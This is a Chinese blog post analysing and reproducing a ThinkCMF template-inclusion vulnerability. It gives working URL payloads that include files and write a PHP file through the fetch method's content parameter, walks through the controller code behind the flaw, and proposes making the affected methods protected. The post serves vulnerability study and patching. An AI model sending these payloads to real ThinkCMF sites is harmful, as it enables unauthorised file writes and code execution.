<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  
  <meta name="description" content="你是这白开水一样淡的日子里偷偷加的一颗糖~~">
  

  
  
  
  
  
  
  <title>ThinkCMF框架任意内容包含漏洞分析复现 | ruanruan</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="0x00 CMS简介ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架，底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制，框架自身提供基础的管理功能，而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务，也可通过系统调用其他应用进行协同工作。在这种运行机制下，开发商场应用的用户无需关心开发SNS应用时如何工作的，但他们之间又可通">
<meta name="keywords" content="漏洞分析复现">
<meta property="og:type" content="article">
<meta property="og:title" content="ThinkCMF框架任意内容包含漏洞分析复现">
<meta property="og:url" content="http://yoursite.com/2019/12/23/ThinkCMF框架任意内容包含漏洞分析复现/index.html">
<meta property="og:site_name" content="ruanruan">
<meta property="og:description" content="0x00 CMS简介ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架，底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制，框架自身提供基础的管理功能，而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务，也可通过系统调用其他应用进行协同工作。在这种运行机制下，开发商场应用的用户无需关心开发SNS应用时如何工作的，但他们之间又可通">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191102122013735.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N5eTAyMDE=,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191102124159603.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N5eTAyMDE=,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191102123307540.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191102123121710.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N5eTAyMDE=,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191102123530901.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191109165829820.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N5eTAyMDE=,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191109171527296.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N5eTAyMDE=,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191109171829488.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191109172052316.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N5eTAyMDE=,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191109172548217.png">
<meta property="og:updated_time" content="2019-12-23T02:50:10.610Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="ThinkCMF框架任意内容包含漏洞分析复现">
<meta name="twitter:description" content="0x00 CMS简介ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架，底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制，框架自身提供基础的管理功能，而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务，也可通过系统调用其他应用进行协同工作。在这种运行机制下，开发商场应用的用户无需关心开发SNS应用时如何工作的，但他们之间又可通">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20191102122013735.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N5eTAyMDE=,size_16,color_FFFFFF,t_70">
  
  
    <link rel="icon" href="/css/images/favicon.ico">
  
  <link rel="stylesheet" href="/css/style.css">
  

  
  <!-- baidu webmaster push -->
  <script src="//push.zhanzhang.baidu.com/push.js"></script>
<link rel="alternate" href="/atom.xml" title="ruanruan" type="application/atom+xml">
</head></html>
<body class="home blog custom-background custom-font-enabled single-author">
  <div id="page" class="hfeed site">
      <header id="masthead" class="site-header" role="banner">
    <hgroup>
      <h1 class="site-title">
        <a href="/" title="ruanruan" rel="home">ruanruan</a>
      </h1>
      
        <h2 class="site-description hitokoto"></h2>
        <script type="text/javascript" src="https://v1.hitokoto.cn/?encode=js"></script>
      
    </hgroup>

    <nav id="site-navigation" class="main-navigation" role="navigation">
            <button class="menu-toggle">菜单</button>
            <a class="assistive-text" href="/#content" title="跳至内容">跳至内容</a><!--TODO-->
            <div class="menu-main-container">
                <ul id="menu-main" class="nav-menu">
                
                    <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="/">Home</a></li>
                
                    <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="/archives">Archives</a></li>
                
                    <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="/about">About</a></li>
                
                    <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="/category">Categories</a></li>
                
                    <li class="menu-item menu-item-type-post_type menu-item-object-page"><a href="/tag">Tags</a></li>
                
                </ul>
            </div>
    </nav>
</header>

      <div id="main" class="wrapper">
        <div id="primary" class="site-content"><div id="content" role="main"><article id="post-ThinkCMF框架任意内容包含漏洞分析复现" class="post-ThinkCMF框架任意内容包含漏洞分析复现 post type-post status-publish format-standard hentry">
    <!---->

      <header class="entry-header">
        
        
  
    <h1 class="entry-title article-title">
      ThinkCMF框架任意内容包含漏洞分析复现
    </h1>
  

        
        <div class="comments-link">
            
            <a href="javascript:void(0);" data-url="http://yoursite.com/2019/12/23/ThinkCMF框架任意内容包含漏洞分析复现/" data-id="ck4i1t3uy0000zwvsp3b9z06w" class="leave-reply bdsharebuttonbox" data-cmd="more">Share</a>
        </div><!-- .comments-link -->
      </header><!-- .entry-header -->

    <div class="entry-content">
      
        <h3 id="0x00-CMS简介"><a href="#0x00-CMS简介" class="headerlink" title="0x00 CMS简介"></a>0x00 CMS简介</h3><p>ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架，底层采用ThinkPHP3.2.3构建。<br>ThinkCMF提出灵活的应用机制，框架自身提供基础的管理功能，而开发者可以根据自身的需求以应用的形式进行扩展。<br>每个应用都能独立的完成自己的任务，也可通过系统调用其他应用进行协同工作。在这种运行机制下，开发商场应用的用户无需关心开发SNS应用时如何工作的，但他们之间又可通过系统本身进行协调，大大的降低了开发成本和沟通成本。<br><a id="more"></a></p>
<h3 id="0x01-漏洞简介"><a href="#0x01-漏洞简介" class="headerlink" title="0x01 漏洞简介"></a>0x01 漏洞简介</h3><ul>
<li>攻击者可利用此漏洞构造恶意的url，向服务器写入任意内容的文件，达到远程代码执行的目的。</li>
<li>影响范围：</li>
</ul>
<p>ThinkCMF X1.6.0<br>ThinkCMF X2.1.0<br>ThinkCMF X2.2.0<br>ThinkCMF X2.2.1<br>ThinkCMF X2.2.2<br>ThinkCMF X2.2.3</p>
<h3 id="0x02-环境搭建"><a href="#0x02-环境搭建" class="headerlink" title="0x02 环境搭建"></a>0x02 环境搭建</h3><p>直接phpstudy一把梭<br><img src="https://img-blog.csdnimg.cn/20191102122013735.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N5eTAyMDE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h3 id="0x03-漏洞利用"><a href="#0x03-漏洞利用" class="headerlink" title="0x03 漏洞利用"></a>0x03 漏洞利用</h3><p><strong>1.通过构造<code>a</code>参数的<code>display()</code>方法，实现任意内容包含漏洞</strong><br>payload:</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?a=display&amp;templateFile=README.md</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20191102124159603.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N5eTAyMDE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p><strong>2.通过构造<code>a</code>参数的<code>fetch()</code>方法，实现任意文件写入</strong><br>payload:</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?a=fetch&amp;templateFile=public/index&amp;prefix=''&amp;content=&lt;php&gt;file_put_contents('test.php','&lt;?php phpinfo(); ?&gt;')&lt;/php&gt;</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20191102123307540.png" alt="在这里插入图片描述"><br>回车执行<br>可以看到根目录下新建的test.php<br><img src="https://img-blog.csdnimg.cn/20191102123121710.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N5eTAyMDE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>打开test.php<br>成功写入一句话<br><img src="https://img-blog.csdnimg.cn/20191102123530901.png" alt="在这里插入图片描述"></p>
<h3 id="0x04-代码分析"><a href="#0x04-代码分析" class="headerlink" title="0x04 代码分析"></a>0x04 代码分析</h3><p>首先看下入口文件<br><img src="https://img-blog.csdnimg.cn/20191109165829820.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N5eTAyMDE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>根据poc盲猜控制器<code>IndexController.class.php</code></p>
<p>可以知道继承了<code>HomebaseController</code>，通过<code>g\m\a</code>参数指定<code>分组\模块\方法</code>，这里可以通过a参数直接调用<code>Portal\IndexController</code>父类(HomebaseController)中的一些权限为<code>public</code>的方法。<br><img src="https://img-blog.csdnimg.cn/20191109171527296.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N5eTAyMDE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>可以看的的public方法里就有<code>display()</code>、<code>fetch(),</code>还有方法作用及参数含义。<br>display函数的作用是加载模板和页面输出，所对应的参数为：templateFile为模板文件地址，charset模板字符集，contentType输出类型，content输出内容。<br><img src="https://img-blog.csdnimg.cn/20191109171829488.png" alt="在这里插入图片描述"><br><code>templateFile</code>参数会经过<code>parseTemplate()</code>方法处理。<br>在<code>\application\Common\Controller\AdminbaseController.class.php</code>的<code>parseTemplate()</code>方法如下<br><img src="https://img-blog.csdnimg.cn/20191109172052316.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N5eTAyMDE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><code>parseTemplate()</code>方法作用：判断模板主题是否存在，当模板主题不存在时会在当前目录下开始查找，形成文件包含。<br><img src="https://img-blog.csdnimg.cn/20191109172548217.png" alt="在这里插入图片描述"><br>fetch函数的作用是获取输出页面内容，调用内置模板引擎。<br>先判断content是否为空，不为空则<code>templateFile</code>参数会经过<code>parseTemplate()</code>方法处理</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">thinkphp的模版引擎使用的是smarty，在smarty中当key和value可控时便可以形成模板注入。</span><br></pre></td></tr></table></figure>
<p>所以当<code>templateFile</code>和<code>prefix</code>参数为空，在<code>content</code>参数传入php代码，便可以形成模板注入。</p>
<h3 id="0x05-漏洞修复"><a href="#0x05-漏洞修复" class="headerlink" title="0x05 漏洞修复"></a>0x05 漏洞修复</h3><p>将<code>HomebaseController.class.php</code>和<code>AdminbaseController.class.php</code>类中<code>display</code>和<code>fetch</code>函数的修饰符改为<code>protected</code>。</p>
<h3 id="0x06-参考文章"><a href="#0x06-参考文章" class="headerlink" title="0x06 参考文章"></a>0x06 参考文章</h3><p><a href="https://xz.aliyun.com/t/6626#toc-5" target="_blank" rel="noopener">https://xz.aliyun.com/t/6626#toc-5</a></p>

      
    </div><!-- .entry-content -->

    <footer class="entry-meta">
    <a href="/2019/12/23/ThinkCMF框架任意内容包含漏洞分析复现/">
    <time datetime="2019-12-23T02:18:19.000Z" class="entry-date">
        2019-12-23
    </time>
</a>
    
  <span class="article-delim">&#8226;</span>
  <div class="article-category">
  <a class="article-category-link" href="/categories/漏洞分析复现/">漏洞分析复现</a>
  </div>

    
  <span class="article-delim">&#8226;</span>
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/漏洞分析复现/">漏洞分析复现</a></li></ul>

    </footer>
</article>


    
<nav class="nav-single">
    <h3 class="assistive-text">文章导航</h3>
    
    
        <span class="nav-next"><a href="/2019/12/23/fiyocms2-0-6-1版本漏洞复现及分析/" rel="next">fiyocms2.0.6.1版本漏洞复现及分析 <span class="meta-nav">→</span></a></span>
    
</nav><!-- .nav-single -->








<!-- 目录内容 -->
             
        <!-- 目录内容结束 -->
</div></div>
        <div id="secondary" class="widget-area" role="complementary">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">About</h3>
    <div class="widget">
      qq：2268713202
    </div>
  </div>

  
    <aside id="search" class="widget widget_search"><form role="search" method="get" accept-charset="utf-8" id="searchform" class="searchform" action="//google.com/search">
    <div>
        <input type="text" value name="s" id="s">
        <input type="submit" id="searchsubmit" value="搜索">
    </div>
</form></aside>
  
    
  
    
  <aside class="widget">
    <h3 class="widget-title">Categories</h3>
    <div class="widget-content">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/漏洞分析复现/">漏洞分析复现</a><span class="category-list-count">1</span></li></ul>
    </div>
  </aside>

  
    
  <aside class="widget">
    <h3 class="widget-title">Recents</h3>
    <div class="widget-content">
      <ul>
        
          <li>
            <a href="/2019/12/23/ThinkCMF框架任意内容包含漏洞分析复现/">ThinkCMF框架任意内容包含漏洞分析复现</a>
          </li>
        
          <li>
            <a href="/2019/12/23/fiyocms2-0-6-1版本漏洞复现及分析/">fiyocms2.0.6.1版本漏洞复现及分析</a>
          </li>
        
      </ul>
    </div>
  </aside>

  
    
  <aside class="widget">
    <h3 class="widget-title">Archives</h3>
    <div class="widget-content">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/12/">December 2019</a><span class="archive-list-count">2</span></li></ul>
    </div>
  </aside>

  
    
  <aside class="widget">
    <h3 class="widget-title">Tags</h3>
    <div class="widget-content">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/漏洞分析复现/">漏洞分析复现</a><span class="tag-list-count">1</span></li></ul>
    </div>
  </aside>

  
    
  <aside class="widget">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget-content tagcloud">
      <a href="/tags/漏洞分析复现/" style="font-size: 10px;">漏洞分析复现</a>
    </div>
  </aside>

  
</div>
      </div>
      <footer id="colophon" role="contentinfo">
    <p>&copy; 2019 ruanruan
    All rights reserved.</p>
    <p>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></p>
</footer>
    <script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"1","bdMiniList":false,"bdPic":"","bdStyle":"2","bdSize":"16"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='/js/share.js'];</script>

<script src="/js/jquery-3.3.1.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>

<script src="/js/navigation.js"></script>

<div id="bg"></div>

  </div>
</body>
</html>